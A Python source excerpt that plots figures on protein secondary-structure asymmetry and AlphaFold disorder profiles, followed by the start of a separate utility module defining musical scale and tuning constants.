enrich_data = pickle.load(open(PATH_FIG_DATA.joinpath("fig3_enrich_acpro.pickle"), 'rb'))
quantiles = enrich_data['edges'].mean(axis=0)
for i, Y in enumerate(['H_ASYM', 'S_ASYM']):
for j in range(len(quantiles)-1):
hist, bins = np.histogram(pdb.loc[pdb.quant==j, Y], bins=bins)
hist = hist / hist.sum()
# total = len(pdb)/10
# left = len(pdb.loc[(pdb.quant==j)&(pdb[Y]<0)]) / total
# right = len(pdb.loc[(pdb.quant==j)&(pdb[Y]>0)]) / total
# print(Y, j, ''.join([f"{x:6.3f}" for x in [left, right, left/right, right / left]]))
if i:
ax[i].bar(X[:mid], (hist/hist.sum())[:mid], width, bottom=[sep*j]*mid, color='grey', alpha=.5)
ax[i].bar(X[-mid:], (hist/hist.sum())[-mid:], width, bottom=[sep*j]*mid, color=col[i], alpha=.5)
else:
ax[i].bar(X[:mid], (hist/hist.sum())[:mid], width, bottom=[sep*j]*mid, color=col[i], alpha=.5)
ax[i].bar(X[-mid:], (hist/hist.sum())[-mid:], width, bottom=[sep*j]*mid, color='grey', alpha=.5)
ax[i].plot(X[:mid], (hist/hist.sum()+sep*j)[:mid], '-', c='k', alpha=.5)
ax[i].plot(X[-mid:], (hist/hist.sum()+sep*j)[-mid:], '-', c='k', alpha=.5)
mean = np.mean(enrich_data[Y[0]], axis=0)
lo = np.abs(mean - np.quantile(enrich_data[Y[0]], 0.025, axis=0))
hi = np.abs(mean - np.quantile(enrich_data[Y[0]], 0.975, axis=0))
ax[2].barh([sep*j+(i+.7)*sep/3 for j in range(10)], mean, sep/3, xerr=(lo, hi), color=col[i], ec='k', alpha=.5, label=lbls[i], error_kw={'lw':.8})
ax[2].plot([0,0], [-0.05, 0.5], '-', c='k', lw=.1)
ax[0].set_yticks(np.arange(len(quantiles))*sep)
ax[0].set_yticklabels([round(x,1) for x in quantiles])
ax[2].legend(loc='upper center', ncol=2, columnspacing=1.5, frameon=False,
bbox_to_anchor=(0.52, 1.15))
for i, t in zip([0,1], ttls):
ax[i].set_title(t)
ax[i].set_xlim(-.15, .15)
ax[i].set_xticks([-.1, 0, .1])
for i in range(3):
ax[i].spines['top'].set_visible(False)
ax[i].spines['right'].set_visible(False)
ax[i].set_ylim(0-sep/4, 0.5+sep)
for i in [1,2]:
ax[i].spines['left'].set_visible(False)
ax[i].set_yticks([])
ax[0].set_xlabel(r"asym$_{\alpha}$")
ax[1].set_xlabel(r"asym$_{\beta}$")
ax[0].set_ylabel(r'$\log_{10}R$')
ax[2].set_xlabel('N terminal\nEnrichment')
pdb = pdb.loc[pdb.OC!='Viruses']
X = np.arange(10)
X = np.array([sep*j+(i+.7)*sep/3 for j in range(10)])
width = .175
ttls = ['Eukaryote ', 'Prokaryote ']
lbls = [r'$E_{\alpha}$', r'$E_{\beta}$']
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
col = [custom_cmap[i] for i in [3, 9, 0, 12]]
paths = [f"fig3_enrich_{a}_acpro.pickle" for a in ['eukaryote', 'prokaryote']]
for i, path in enumerate(paths):
enrich_data = pickle.load(open(PATH_FIG_DATA.joinpath(path), 'rb'))
for j, Y in enumerate(['H_ASYM', 'S_ASYM']):
# adjust = (j - 1 + i*2)*width
adjust = (j*2 - 4.0 + i)*(sep/5)
mean = np.mean(enrich_data[Y[0]], axis=0)
lo = np.abs(mean - np.quantile(enrich_data[Y[0]], 0.025, axis=0))
hi = np.abs(mean - np.quantile(enrich_data[Y[0]], 0.975, axis=0))
print(i, Y, max(np.abs(mean)))
ax[3].barh(X+adjust, mean, sep/5.0, ec='k', xerr=(lo, hi), color=col[i*2+j],
label=ttls[i]+lbls[j], lw=0.001, error_kw={'lw':.2})
ax[3].plot([0,0], [-0.05, 0.5], '-', c='k', lw=.1)
ax[3].set_yticks(np.arange(len(quantiles))*sep)
ax[3].set_ylabel(r'$\log_{10} R$')
ax[3].set_yticklabels([round(x,1) for x in quantiles])
ax[3].set_xlabel('N terminal\nEnrichment')
ax[3].set_xlim(-.42, .42)
ax[3].set_ylim(0-sep/4, 0.5+sep)
ax[3].spines['top'].set_visible(False)
ax[3].spines['left'].set_visible(False)
handles = [mpatches.Patch([], [], color=col[j*2+i], label=ttls[j]+lbls[i]) for i in [0,1] for j in [1,0]]
ax[3].legend(handles=handles, bbox_to_anchor=(1.05, 1.25), frameon=False,
loc='upper right', ncol=2, columnspacing=1.0, handlelength=1.5)
ax[3].yaxis.set_label_position('right')
ax[3].yaxis.tick_right()
####################################################################
### FIG 11
def fig11(pdb, X='AA_PDB', Y='CO', w=.1, ax='', fig=''):
if isinstance(ax, str):
fig, ax = plt.subplots(4,2, figsize=(9,12))
fig.subplots_adjust(wspace=0.0, hspace=0.65)
# ax = ax.reshape(ax.size)
pdb_CO = np.load(PATH_FIG_DATA.joinpath("pdb_config_CO.npy"))[:,:,0]
df = pdb.copy()
q = np.arange(w,1+w,w)
lbls = ['Helix', 'Sheet']
# cb_lbl = [r"$E_{\alpha}$", r"$E_{\beta}$"]
cb_lbl = [r"$asym_{\alpha}$", r"$asym_{\beta}$"]
vmax = 0.03
vmin = -vmax
for j, co in enumerate(pdb_CO.T):
df['CO'] = co
quant1 = [df[X].min()] + list(df[X].quantile(q).values)
quant2 = [df[Y].min()] + list(df[Y].quantile(q).values)
for i, Z in enumerate(['H_ASYM', 'S_ASYM']):
mean = []
for l1, h1 in zip(quant1[:-1], quant1[1:]):
for l2, h2 in zip(quant2[:-1], quant2[1:]):
samp = df.loc[(df[X]>=l1)&(df[X]<h1)&(df[Y]>=l2)&(df[Y]<h2), Z]
mean.append(samp.mean())
# left = len(df.loc[(df[X]>=l1)&(df[X]<h1)&(df[Y]>=l2)&(df[Y]<h2)&(df[Z]<0)])
# right = len(df.loc[(df[X]>=l1)&(df[X]<h1)&(df[Y]>=l2)&(df[Y]<h2)&(df[Z]>0)])
# tot = max(len(df.loc[(df[X]>=l1)&(df[X]<h1)&(df[Y]>=l2)&(df[Y]<h2)]), 1)
# mean.append((right - left)/tot)
cmap = sns.diverging_palette(230, 22, s=100, l=47, as_cmap=True)
norm = colors.BoundaryNorm([vmin, vmax], cmap.N)
bounds = np.linspace(vmin, vmax, 3)
im = ax[j,i].imshow(np.array(mean).reshape(q.size, q.size).T, cmap=cmap, vmin=vmin, vmax=vmax)
cbar = fig.colorbar(im, cmap=cmap, ticks=bounds, ax=ax[j,i], fraction=0.046, pad=0.04)
cbar.set_label(cb_lbl[i], labelpad=-5)
ax[j,i].set_title(lbls[i])
ax[j,i].set_xticks(np.arange(q.size+1)-0.5)
ax[j,i].set_yticks(np.arange(q.size+1)-0.5)
ax[j,i].set_xticklabels([int(x) for x in quant1], rotation=90)
ax[j,i].set_yticklabels([int(round(x,0)) for x in quant2])
for a in ax.ravel():
a.invert_yaxis()
a.set_xlabel('Sequence Length')
a.set_ylabel('Contact Order')
a.tick_params(axis='both', which='major', direction='in')
fs = 14
for i, b in zip(range(4), list('ABCDEFGHI')):
ax[i,0].text( -0.20, 1.16, b, transform=ax[i,0].transAxes, fontsize=fs)
fig.savefig(PATH_FIG.joinpath("si11.pdf"), bbox_inches='tight')
def fig12(pdb, X='REL_RATE', Y='S_ASYM', w=0.1):
fig = plt.figure(figsize=(8,12))
gs = GridSpec(3,2, wspace=0.4, hspace=0.5, width_ratios=[1,1])
ax_all = [[fig.add_subplot(gs[j,i]) for i in [0,1]] for j in range(3)]
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[2]
c_sheet = custom_cmap[10]
col = [c_helix, c_sheet]
bins = np.linspace(-0.20, 0.20, 80)
width = np.diff(bins[:2])
mid = 39
sep = 0.05
lbls = ['Sheet', 'Helix']
quantiles = pdb[X].quantile(np.arange(0,1+w,w)).values
# print(np.round(quantiles, 2))
pdb['quant'] = pdb[X].apply(lambda x: utils.assign_quantile(x, quantiles))
# pdb['quant'] = np.random.choice(pdb['quant'], len(pdb), replace=False)
for ax, threshold in zip(ax_all, [0, 0.025, 0.05]):
print(f"threshold = {threshold}")
for i, Y in enumerate(['S_ASYM', 'H_ASYM']):
ratio1 = []
ratio2 = []
lefts = []
rights = []
for j in range(len(quantiles)-1):
hist, bins = np.histogram(pdb.loc[pdb.quant==j, Y], bins=bins)
hist = hist / hist.sum()
left = len(pdb.loc[(pdb.quant==j)&(pdb[Y]<-threshold)]) / max(len(pdb.loc[(pdb.quant==j)]), 1)
right = len(pdb.loc[(pdb.quant==j)&(pdb[Y]>threshold)]) / max(len(pdb.loc[(pdb.quant==j)]), 1)
lefts.append(left)
rights.append(right)
ratio1.append((right - left))
ratio2.append(np.log2(right / left))
print(Y, j, left, right)
xgrid = [sep*j+(i+1.0)*sep/3 for j in range(len(quantiles)-1)]
ax[0].barh(xgrid, ratio1, sep/3, color=col[i], alpha=.5)
ax[1].barh(xgrid, ratio2, sep/3, color=col[i], alpha=.5)
ax[0].set_xticks(np.arange(-0.3, 0.4, 0.1))
for a in ax:
a.set_yticks(np.arange(len(quantiles))*sep)
a.set_yticklabels([round(x,1) for x in quantiles])
a.plot([0,0], [-0.05, 0.5], '-', c='k', lw=.1)
a.spines['top'].set_visible(False)
a.spines['right'].set_visible(False)
a.set_ylim(0, 0.5)
a.set_ylabel(r'$\log_{10}R$')
ax[0].set_xlim(-0.35, 0.35)
ax[1].set_xlim(-1.50, 1.50)
ax[0].set_xlabel(r'$P(\mathregular{{asym}} \geq {0}) - P(\mathregular{{asym}} \leq -{0})$'.format(*[threshold]*2))
ax[1].set_xlabel(r'$\log_{{2}} \frac{{P(\mathregular{{asym}} \geq {0})}}{{P(\mathregular{{asym}} \leq -{0})}} $'.format(*[threshold]*2))
fig.savefig(PATH_FIG.joinpath("si12.pdf"), bbox_inches='tight')
def fig13(df, X='AA_PDB', Y='CO', w=.1, ax='', fig=''):
if isinstance(ax, str):
fig, ax = plt.subplots(1,3, figsize=(15,4))
fig.subplots_adjust(wspace=0.5)
q = np.arange(w,1+w,w)
quant1 = [df[X].min()] + list(df[X].quantile(q).values)
quant2 = [df[Y].min()] + list(df[Y].quantile(q).values)
lbls = ['Helix', 'Sheet']
cb_lbl = [r"$asym_{\alpha}$", r"$asym_{\beta}$"]
vmax = 0.03
vmin = -vmax
count = []
for i, Z in enumerate(['H_ASYM', 'S_ASYM']):
mean = []
for l1, h1 in zip(quant1[:-1], quant1[1:]):
for l2, h2 in zip(quant2[:-1], quant2[1:]):
samp = df.loc[(df[X]>=l1)&(df[X]<h1)&(df[Y]>=l2)&(df[Y]<h2), Z]
mean.append(samp.mean())
# left = len(df.loc[(df[X]>=l1)&(df[X]<h1)&(df[Y]>=l2)&(df[Y]<h2)&(df[Z]<0)])
# right = len(df.loc[(df[X]>=l1)&(df[X]<h1)&(df[Y]>=l2)&(df[Y]<h2)&(df[Z]>0)])
# tot = max(len(df.loc[(df[X]>=l1)&(df[X]<h1)&(df[Y]>=l2)&(df[Y]<h2)]), 1)
# mean.append((right - left)/tot)
if not i:
count.append(len(samp))
# print(len(samp))
mean = np.array(mean).reshape(q.size, q.size)
count = np.array(count).reshape(q.size, q.size)
cmap = sns.diverging_palette(230, 22, s=100, l=47, as_cmap=True)
norm = colors.BoundaryNorm([vmin, vmax], cmap.N)
bounds = np.linspace(vmin, vmax, 3)
im = ax[i].imshow(mean.T, cmap=cmap, vmin=vmin, vmax=vmax)
cbar = fig.colorbar(im, cmap=cmap, ticks=bounds, ax=ax[i], fraction=0.046, pad=0.04)
cbar.set_label(cb_lbl[i], labelpad=-5)
ax[i].set_title(lbls[i])
ax[i].set_xticks(np.arange(q.size+1)-0.5)
ax[i].set_yticks(np.arange(q.size+1)-0.5)
ax[i].set_xticklabels([int(x) for x in quant1], rotation=90)
ax[i].set_yticklabels([int(round(x,0)) for x in quant2])
for i in [2]:
cmap = plt.cm.Greys
# norm = colors.BoundaryNorm([-.04, .04], cmap.N)
# bounds = np.linspace(-.04, .04, 5)
im = ax[i].imshow(np.array(count).reshape(q.size, q.size).T, cmap=cmap, vmin=0)
cbar = fig.colorbar(im, cmap=cmap, ax=ax[i], fraction=0.046, pad=0.04)
cbar.set_label('Count')
ax[i].set_title('Distribution')
ax[i].set_xticks(np.arange(q.size+1)-0.5)
ax[i].set_yticks(np.arange(q.size+1)-0.5)
ax[i].set_xticklabels([int(x) for x in quant1], rotation=90)
ax[i].set_yticklabels([int(round(x,0)) for x in quant2])
for a in ax:
a.invert_yaxis()
a.set_xlabel('Sequence Length')
a.set_ylabel('Contact Order')
a.tick_params(axis='both', which='major', direction='in')
fs = 14
for i, b in zip([0,1,2], list('ABCDEFGHI')):
ax[i].text( -0.20, 1.05, b, transform=ax[i].transAxes, fontsize=fs)
fig.savefig(PATH_FIG.joinpath("si13.pdf"), bbox_inches='tight')
def scop_ss():
fig, ax = plt.subplots(2,1)
cat = 'HS.D'
N = 50
X = np.arange(50)
Nboot, Cboot, asym, enrich_edges, enrich_vals = pickle.load(open(PATH_FIG_DATA.joinpath(f"pdb_scop_indep.pickle"), 'rb'))
data = [Nboot, Cboot, asym]
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[2]
c_sheet = custom_cmap[10]
col = [c_helix, c_sheet, "#CB7CE6", "#79C726"]
lbls = ['Helix', 'Sheet', 'Coil', 'Disorder']
for j, s in enumerate(cat):
ax[0].plot(X, data[0][s]['mean']/4, '-', c=col[j], label=f"{s} N")
ax[0].fill_between(X, data[0][s]['hi']/4, data[0][s]['lo']/4, color="grey", label=f"{s} N", alpha=0.5)
ax[0].plot(X, data[1][s]['mean']/4, '--', c=col[j], label=f"{s} N")
ax[0].fill_between(X, data[1][s]['hi']/4, data[1][s]['lo']/4, color="grey", label=f"{s} N", alpha=0.2)
print(s, round(np.mean(data[2][s]['mean']), 2), round(np.mean(data[2][s]['mean'][:20]), 2), round(np.mean(data[2][s]['mean'][20:]), 2))
ax[1].plot(X, np.log2(data[2][s]['mean']), '-', c=col[j], label=lbls[j])
ax[1].fill_between(X, np.log2(data[2][s]['hi']), np.log2(data[2][s]['lo']), color="grey", label=f"{s} N", alpha=0.2)
ax[1].set_ylim(-1, 1.3)
ax[1].plot([0]*50, '-', c='k')
ax[1].set_yticks(np.arange(-1,1.5,0.5))
ax[0].set_ylim(0, 0.6)
ax[1].set_xlabel('Sequence distance from ends')
ax[0].set_ylabel('Secondary structure\nprobability')
ax[1].set_ylabel('Structural asymmetry\n$\\log_2 (N / C)$')
fs = 14
for i, b in zip([0,1], list('ABCDEFGHI')):
ax[i].text( -0.10, 1.05, b, transform=ax[i].transAxes, fontsize=fs)
fig.savefig(PATH_FIG.joinpath("si14.pdf"), bbox_inches='tight')
def percentage_asym(x):
return np.sign(x) * 100*2**(abs(x)) - np.sign(x) * 100
def fig15():
fig, ax = plt.subplots(3,1, figsize=(10,10))
cat = 'HS.D'
N = 100
X = np.arange(N)
Nboot, Cboot, asym, = pickle.load(open(PATH_FIG_DATA.joinpath(f"pdb_ss_max_asym.pickle"), 'rb'))
data = [Nboot, Cboot, asym]
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[2]
c_sheet = custom_cmap[10]
col = [c_helix, c_sheet, "#CB7CE6", "#79C726"]
lbls = ['Helix', 'Sheet', 'Coil', 'Disorder']
X2 = np.arange(5)
for j, s in enumerate(cat):
ax[0].plot(X, data[0][s]['mean']/2, '-', c=col[j], label=f"{s} N")
ax[0].fill_between(X, data[0][s]['hi']/2, data[0][s]['lo']/2, color="grey", label=f"{s} N", alpha=0.5)
ax[0].plot(X, data[1][s]['mean']/2, '--', c=col[j], label=f"{s} N")
ax[0].fill_between(X, data[1][s]['hi']/2, data[1][s]['lo']/2, color="grey", label=f"{s} N", alpha=0.2)
for k in range(5):
print(s, round(np.mean(data[2][s]['mean']), 2), round(np.mean(data[2][s]['mean'][k*20:(k+1)*20]), 2))
ax[1].plot(X, np.log2(data[2][s]['mean']), '-', c=col[j], label=lbls[j])
ax[1].fill_between(X, np.log2(data[2][s]['hi']), np.log2(data[2][s]['lo']), color="grey", label=f"{s} N", alpha=0.2)
if s in 'HS':
Y2 = [percentage_asym(np.log2(data[2][s]['mean'])[k*20:(k+1)*20].mean()) for k in range(5)]
ax[2].bar(X2, Y2, 0.5, color=col[j], label=lbls[j], ec='k')
ax[1].set_ylim(-1.5, 2.0)
ax[1].plot([0]*100, '-', c='k')
ax[2].plot([0]*5, '-', c='k')
ax[1].set_yticks(np.arange(-1,2.5,0.5))
ax[0].set_ylim(0, 0.6)
ax[2].set_xticks(np.arange(5))
ax[2].set_xticklabels([f"{i*20} - {(i+1)*20}" for i in range(5)])
ax[0].set_xlabel('Sequence distance from ends')
ax[1].set_xlabel('Sequence distance from ends')
ax[2].set_xlabel('Sequence distance from ends')
ax[0].set_ylabel('Secondary structure\nprobability')
ax[1].set_ylabel('Structural asymmetry\n$\\log_2 (N / C)$')
ax[2].set_ylabel('Percentage asymmetry')
fs = 14
for i, b in zip([0,1,2], list('ABCDEFGHI')):
ax[i].text( -0.10, 1.05, b, transform=ax[i].transAxes, fontsize=fs)
fig.savefig(PATH_FIG.joinpath("si15.pdf"), bbox_inches='tight')
def oligomer(pdb, X='REL_RATE', Y='S_ASYM', w=0.1):
pdb = pdb.copy()
fig = plt.figure(figsize=(8,8))
gs = GridSpec(2,2, wspace=0.4, hspace=0.5, width_ratios=[1,1])
ax_all = [[fig.add_subplot(gs[j,i]) for i in [0,1]] for j in range(2)]
custom_cmap = sns.diverging_palette(230, 22, s=100, l=47, n=13)
c_helix = custom_cmap[2]
c_sheet = custom_cmap[10]
col = [c_helix, c_sheet]
bins = np.linspace(-0.20, 0.20, 80)
width = np.diff(bins[:2])
mid = 39
sep = 0.05
threshold = 0
lbls = [r'$E_{\beta}$', r'$E_{\alpha}$']
ttls = ['Monomers', 'Oligomers']
for ax, idx, ttl in zip(ax_all, [pdb.NPROT==1, pdb.NPROT>1], ttls):
quantiles = pdb.loc[idx, X].quantile(np.arange(0,1+w,w)).values
pdb['quant'] = pdb.loc[idx, X].apply(lambda x: utils.assign_quantile(x, quantiles))
for i, Y in enumerate(['S_ASYM', 'H_ASYM']):
ratio1 = []
ratio2 = []
lefts = []
rights = []
for j in range(len(quantiles)-1):
hist, bins = np.histogram(pdb.loc[(idx)&(pdb.quant==j), Y], bins=bins)
hist = hist / hist.sum()
left = len(pdb.loc[(idx)&(pdb.quant==j)&(pdb[Y]<-threshold)]) / max(len(pdb.loc[(idx)&(pdb.quant==j)]), 1)
right = len(pdb.loc[(idx)&(pdb.quant==j)&(pdb[Y]>threshold)]) / max(len(pdb.loc[(idx)&(pdb.quant==j)]), 1)
lefts.append(left)
rights.append(right)
ratio1.append((right - left))
ratio2.append(np.log2(right / left))
xgrid = [sep*j+(i+1.0)*sep/3 for j in range(len(quantiles)-1)]
ax[0].barh(xgrid, ratio1, sep/3, color=col[i], alpha=.5, label=lbls[i])
ax[1].barh(xgrid, ratio2, sep/3, color=col[i], alpha=.5)
ax[0].set_xticks(np.arange(-0.3, 0.4, 0.1))
for a in ax:
a.set_yticks(np.arange(len(quantiles))*sep)
a.set_yticklabels([round(x,1) for x in quantiles])
a.plot([0,0], [-0.05, 0.5], '-', c='k', lw=.1)
a.spines['top'].set_visible(False)
a.spines['right'].set_visible(False)
a.set_ylim(0, 0.5)
a.set_ylabel(r'$\log_{10}R$')
a.set_title(f"{ttl}, N={np.sum(idx)}")
ax[0].set_xlim(-0.35, 0.35)
ax[1].set_xlim(-1.50, 1.50)
ax[0].set_xlabel(r'$P(\mathregular{{asym}} \geq {0}) - P(\mathregular{{asym}} \leq -{0})$'.format(*[threshold]*2))
ax[1].set_xlabel(r'$\log_{{2}} \frac{{P(\mathregular{{asym}} \geq {0})}}{{P(\mathregular{{asym}} \leq -{0})}} $'.format(*[threshold]*2))
ax[0].legend(loc='upper center', ncol=2, columnspacing=3, frameon=False,
bbox_to_anchor=(1.20, 1.20))
fig.savefig(PATH_FIG.joinpath("si16.pdf"), bbox_inches='tight')
fig.savefig(PATH_FIG.joinpath("oligomers.png"), bbox_inches='tight')
def scop2(X='REL_RATE', Y='S_ASYM', w=0.1):
fig, ax = plt.subplots(figsize=(10,6))
edges, data = pickle.load(open(PATH_FIG_DATA.joinpath("pdb_scop_indep.pickle"), 'rb'))[3:]
edges = edges[0]
sep = 0.05
lbls = [r'$E_{\alpha}$', r'$E_{\beta}$']
for i, Y in enumerate(['H_ASYM', 'S_ASYM']):
mean = np.mean(data[:,i], axis=0)
lo = np.abs(mean - np.quantile(data[:,i], 0.025, axis=0))
hi = np.abs(mean - np.quantile(data[:,i], 0.975, axis=0))
ax.barh([sep*j+(i+.7)*sep/3 for j in range(10)], mean, sep/3, xerr=(lo, hi), color=col[i], ec='k', alpha=.5, label=lbls[i], error_kw={'lw':.8})
ax.plot([0,0], [-0.05, 0.5], '-', c='k', lw=.1)
ax.set_yticks(np.arange(len(edges))*sep)
ax.set_yticklabels([round(x,1) for x in edges])
ax.legend(loc='upper center', ncol=2, columnspacing=3, frameon=False,
bbox_to_anchor=(0.52, 1.06))
ax.set_xlim(-.38, .38)
ax.set_xticks(np.arange(-.3, .4, .1))
# To create this figure, you need to download the complete
# Human and E. coli proteomes at:
# https://alphafold.ebi.ac.uk/download
# and then change the code so that "base" points to the
# folder that contains the downloaded ".pdb" files
def disorder_proteome(N=100):
fig, ax = plt.subplots(1,2, figsize=(12,4))
lbls = ["Human", "Ecoli"]
ttls = ["Human", "E. coli"]
for i, l in enumerate(lbls):
path = PATH_FIG_DATA.joinpath(f"alphafold_{l}.npy")
if not path.exists():
base = PATH_BASE.joinpath(f"AlphaFold/{l}")
countN = np.zeros(N, float)
countC = np.zeros(N, float)
tot = np.zeros(N, float)
with Pool(50) as pool:
dis = list(pool.imap_unordered(utils.get_disorder_from_conf, base.glob("*pdb"), 10))
for d in dis:
n = min(int(len(d)/2), N)
countN[:n] = countN[:n] + d[:n]
countC[:n] = countC[:n] + d[-n:][::-1]
tot[:n] = tot[:n] + 1
fracN = countN / tot
fracC = countC / tot
np.save(path, np.array([fracN, fracC]))
else:
fracN, fracC = np.load(path)
ax[i].plot(np.arange(N)+1, fracN, '-', label='N')
ax[i].plot(np.arange(N)+1, fracC, '--', label='C')
ax[i].set_title(ttls[i])
ax[i].set_xlabel("Sequence distance from ends")
ax[i].set_ylabel("Disorder probability")
ax[i].set_ylim(0, 1)
ax[i].legend(loc='best', frameon=False)
fig.savefig(PATH_FIG.joinpath("si17.pdf"), bbox_inches='tight')
def kfold_vs_ss():
pfdb = asym_io.load_pfdb()
fig, ax = plt.subplots(figsize=(8,8))
for c in pfdb.Class.unique():
X = np.log10(pfdb.loc[pfdb.Class==c, 'L'])
Y = pfdb.loc[pfdb.Class==c, 'log_kf']
sns.regplot(X, Y, label=c)
ax.set_xlabel(r"$\log_{10}$ Sequence Length")
ax.set_ylabel(r"$\log_{10} k_f$")
ax.legend(loc='best', frameon=False)
fig.savefig(PATH_FIG.joinpath("si18.pdf"), bbox_inches='tight')
def hbond_asym(pdb, Xl='REL_RATE', Y='hb_asym', w=0.1):
fig = plt.figure(figsize=(9,6))
gs = GridSpec(1,2, wspace=0.2, hspace=0.0, width_ratios=[1,.3])
ax = [fig.add_subplot(gs[i]) for i in [0,1]]
col = np.array(Paired_12.hex_colors)[[1,3]]
bins = np.linspace(-0.20, 0.20, 80)
width = np.diff(bins[:2])
X = bins[:-1] + width * 0.5
mid = 39
sep = 0.05
quantiles = pdb[Xl].quantile(np.arange(0,1+w,w)).values
ratio = []
lefts = []
rights = []
threshold = 0.00
for j in range(len(quantiles)-1):
hist, bins = np.histogram(pdb.loc[pdb.quant==j, Y], bins=bins)
hist = hist / hist.sum()
left = len(pdb.loc[(pdb.quant==j)&(pdb[Y]<-threshold)]) / max(len(pdb.loc[(pdb.quant==j)]), 1)
right = len(pdb.loc[(pdb.quant==j)&(pdb[Y]>threshold)]) / max(len(pdb.loc[(pdb.quant==j)]), 1)
lefts.append(left)
rights.append(right)
ratio.append((right - left))
ax[0].bar(X[:mid], (hist/hist.sum())[:mid], width, bottom=[sep*j]*mid, color='grey', alpha=.5)
ax[0].bar(X[-mid:], (hist/hist.sum())[-mid:], width, bottom=[sep*j]*mid, color=col[0], alpha=.5)
ax[0].plot(X[:mid], (hist/hist.sum()+sep*j)[:mid], '-', c='k', alpha=.5)
ax[0].plot(X[-mid:], (hist/hist.sum()+sep*j)[-mid:], '-', c='k', alpha=.5)
ax[0].set_yticks(np.arange(len(quantiles))*sep)
ax[0].set_yticklabels([round(x,1) for x in quantiles])
ax[1].barh([sep*j+sep/2 for j in range(len(quantiles)-1)], ratio, sep/2, color=[col[0] if r > 0 else 'grey' for r in ratio], alpha=.5)
ax[1].plot([0,0], [-0.05, 0.5], '-', c='k', lw=.1)
ax[0].spines['top'].set_visible(False)
ax[0].spines['right'].set_visible(False)
ax[1].spines['top'].set_visible(False)
ax[1].spines['right'].set_visible(False)
ax[1].spines['left'].set_visible(False)
ax[1].set_yticks([])
for a in ax:
a.set_ylim(0, 0.60)
ax[0].set_xlabel('Asymmetry in mean hydrogen bond length')
ax[0].set_ylabel(r'$\log_{10}R$')
ax[1].set_xlabel('N terminal enrichment')
fig.savefig(PATH_FIG.joinpath("si19.pdf"), bbox_inches='tight')
def hyd_asym(pdb, Xl='REL_RATE', Y='hyd_asym', w=0.1):
fig = plt.figure(figsize=(9,6))
gs = GridSpec(1,2, wspace=0.2, hspace=0.0, width_ratios=[1,.3])
ax = [fig.add_subplot(gs[i]) for i in [0,1]]
col = np.array(Paired_12.hex_colors)[[1,3]]
bins = np.linspace(-4.5, 4.5, 80)
width = np.diff(bins[:2])
X = bins[:-1] + width * 0.5
mid = 39
sep = 0.05
quantiles = pdb[Xl].quantile(np.arange(0,1+w,w)).values
ratio = []
lefts = []
rights = []
threshold = 0.00
for j in range(len(quantiles)-1):
hist, bins = np.histogram(pdb.loc[pdb.quant==j, Y], bins=bins)
hist = hist / hist.sum()
left = len(pdb.loc[(pdb.quant==j)&(pdb[Y]<-threshold)]) / max(len(pdb.loc[(pdb.quant==j)]), 1)
right = len(pdb.loc[(pdb.quant==j)&(pdb[Y]>threshold)]) / max(len(pdb.loc[(pdb.quant==j)]), 1)
lefts.append(left)
rights.append(right)
ratio.append((right - left))
ax[0].bar(X[:mid], (hist/hist.sum())[:mid], width, bottom=[sep*j]*mid, color='grey', alpha=.5)
ax[0].bar(X[-mid:], (hist/hist.sum())[-mid:], width, bottom=[sep*j]*mid, color=col[0], alpha=.5)
ax[0].plot(X[:mid], (hist/hist.sum()+sep*j)[:mid], '-', c='k', alpha=.5)
ax[0].plot(X[-mid:], (hist/hist.sum()+sep*j)[-mid:], '-', c='k', alpha=.5)
ax[0].set_yticks(np.arange(len(quantiles))*sep)
ax[0].set_yticklabels([round(x,1) for x in quantiles])
ax[1].barh([sep*j+sep/2 for j in range(len(quantiles)-1)], ratio, sep/2, color=[col[0] if r > 0 else 'grey' for r in ratio], alpha=.5)
ax[1].plot([0,0], [-0.05, 0.5], '-', c='k', lw=.1)
ax[0].spines['top'].set_visible(False)
ax[0].spines['right'].set_visible(False)
ax[1].spines['top'].set_visible(False)
ax[1].spines['right'].set_visible(False)
ax[1].spines['left'].set_visible(False)
ax[1].set_yticks([])
for a in ax:
a.set_ylim(0, 0.60)
ax[0].set_xlabel('Asymmetry in mean hydrophobicity')
ax[0].set_ylabel(r'$\log_{10}R$')
ax[1].set_xlabel('N terminal enrichment')
fig.savefig(PATH_FIG.joinpath("si20.pdf"), bbox_inches='tight')
``` |
{
"source": "jomimc/imperfect_fifths",
"score": 2
} |
#### File: Scales_database/Src/all_utils.py
```python
import re
import sys
import time
import matplotlib.pyplot as plt
from itertools import permutations
import numpy as np
import pandas as pd
import seaborn as sns
from sklearn.cluster import DBSCAN
import statsmodels.nonparametric.api as smnp
import swifter
INST = np.array([1,0,1,0,1,1,0,1,0,1,1,1,1,0,1,0,1,1,0,1,0,1,1,1,1], dtype=bool)
CENT_DIFF_MAX = 11.0
BETA = 50.
### Theoretical scale markers
### PYT = Pythagorean tuning
### EQ5 = 5-Tone Equal Temperament
### JI = Just intonation
### CHINA = Shi-er-lu
### The rest are sourced from Rechberger, Herman
PYT_INTS = np.array([0., 90.2, 203.9, 294.1, 407.8, 498.1, 611.7, 702., 792.2, 905., 996.1, 1109.8, 1200.])
EQ5_INTS = np.linspace(0, 1200, num=6, endpoint=True, dtype=float)
EQ7_INTS = np.linspace(0, 1200, num=8, endpoint=True, dtype=float)
EQ9_INTS = np.linspace(0, 1200, num=10, endpoint=True, dtype=float)
EQ10_INTS = np.linspace(0, 1200, num=11, endpoint=True, dtype=float)
EQ12_INTS = np.linspace(0, 1200, num=13, endpoint=True, dtype=float)
EQ24_INTS = np.linspace(0, 1200, num=25, endpoint=True, dtype=float)
EQ53_INTS = np.linspace(0, 1200, num=54, endpoint=True, dtype=float)
JI_INTS = np.array([0., 111.7, 203.9, 315.6, 386.3, 498.1, 590.2, 702., 813.7, 884.4, 1017.6, 1088.3, 1200.])
SLENDRO = np.array([263., 223., 253., 236., 225.])
PELOG = np.array([167., 245., 125., 146., 252., 165., 100.])
DASTGAH = np.array([0., 90., 133.23, 204., 294.14, 337.14, 407.82, 498., 568.72, 631.28, 702., 792.18, 835.2, 906., 996., 1039.1, 1109.77, 1200.])
TURKISH = {'T':203.8, 'K':181.1, 'S':113.2, 'B':90.6, 'F':22.6, 'A':271, 'E':67.9}
KHMER_1 = np.array([185., 195., 105., 195., 195., 185., 140.])
KHMER_2 = np.array([190., 190., 130., 190., 190., 190., 120.])
